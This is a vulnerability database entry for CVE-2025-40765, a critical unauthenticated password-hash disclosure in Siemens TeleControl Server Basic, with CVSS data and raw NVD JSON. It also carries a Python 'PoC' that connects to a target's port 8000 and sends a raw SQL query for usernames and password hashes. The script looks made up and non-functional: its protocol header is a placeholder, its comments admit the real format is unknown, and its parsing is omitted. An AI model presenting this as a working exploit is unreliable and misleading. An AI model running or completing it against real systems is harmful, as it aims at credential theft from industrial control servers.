Security Vulnerability Report
CVE-2025-40765 CVSS 9.8 CRITICAL

CVE-2025-40765

Published: 2025-10-14 10:15:38
Last Modified: 2025-10-21 14:40:15

Description

A vulnerability has been identified in TeleControl Server Basic V3.1 (All versions >= V3.1.2.2 < V3.1.2.3). The affected application contains an information disclosure vulnerability. This could allow an unauthenticated remote attacker to obtain password hashes of users and to login to and perform authenticated operations of the database service.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:siemens:telecontrol_server_basic:3.1.2.2:*:*:*:*:*:*:* - VULNERABLE
Siemens TeleControl Server Basic V3.1 >= V3.1.2.2 and < V3.1.2.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-40765 - Siemens TeleControl Server Basic Information Disclosure PoC # This PoC demonstrates how an unauthenticated attacker can retrieve # password hashes from the database service of TeleControl Server Basic V3.1 # Affected versions: >= V3.1.2.2 and < V3.1.2.3 import socket import struct import sys TARGET_HOST = "<target_ip>" TARGET_PORT = 8000 # Default port for TeleControl Server Basic DB service def build_exploit_request(): """ Build a crafted request to the database service to retrieve user password hashes without authentication. """ # Crafted protocol request to query user credentials table # The exact payload structure depends on the proprietary protocol # used by TeleControl Server Basic database service payload = b"\x00\x00\x00\x00" # Protocol header placeholder payload += b"SELECT username, password_hash FROM tcs_users;" # Length prefix length = struct.pack(">I", len(payload)) return length + payload def exploit(target_host, target_port): """ Send exploit request and receive password hashes. """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((target_host, target_port)) # Send crafted request request = build_exploit_request() sock.send(request) # Receive response containing password hashes response = sock.recv(4096) print(f"[*] Response received ({len(response)} bytes)") print(f"[*] Raw data: {response.hex()}") # Parse password hashes from response # ... (parsing logic depends on response format) sock.close() return response except Exception as e: print(f"[-] Error: {e}") return None if __name__ == "__main__": if len(sys.argv) > 1: TARGET_HOST = sys.argv[1] print(f"[*] Targeting {TARGET_HOST}:{TARGET_PORT}") result = exploit(TARGET_HOST, TARGET_PORT) if result: print("[+] Exploit completed - password hashes may have been retrieved") else: print("[-] Exploit failed")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-40765", "sourceIdentifier": "[email protected]", "published": "2025-10-14T10:15:38.127", "lastModified": "2025-10-21T14:40:15.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been identified in TeleControl Server Basic V3.1 (All versions >= V3.1.2.2 < V3.1.2.3). The affected application contains an information disclosure vulnerability. This could allow an unauthenticated remote attacker to obtain password hashes of users and to login to and perform authenticated operations of the database service."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:siemens:telecontrol_server_basic:3.1.2.2:*:*:*:*:*:*:*", "matchCriteriaId": "3FFBD445-E6F8-448C-8227-DC0580999FFE"}]}]}], "references": [{"url": "https://cert-portal.siemens.com/productcert/html/ssa-062309.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}